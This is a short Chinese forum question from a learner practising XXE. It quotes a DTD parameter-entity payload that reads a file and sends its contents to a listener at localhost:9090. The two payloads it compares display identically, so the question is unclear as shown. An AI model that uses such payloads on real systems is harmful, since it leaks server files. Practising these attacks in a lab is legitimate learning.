当我练习 XXE 时,我发现当我使用下面的 DTD ENTITY 来发送我的请求时它起作用了。
<!ENTITY % print "<!ENTITY % send SYSTEM 'http://localhost:9090/landing?text=%file;'>">
但是当我发送它时它不起作用。
<!ENTITY % print "<!ENTITY % send SYSTEM 'http://localhost:9090/landing?text=%file;'>">
它们之间的区别是“%”和“%”,我想知道为什么我在这里直接使用“%”时不起作用。谢谢你。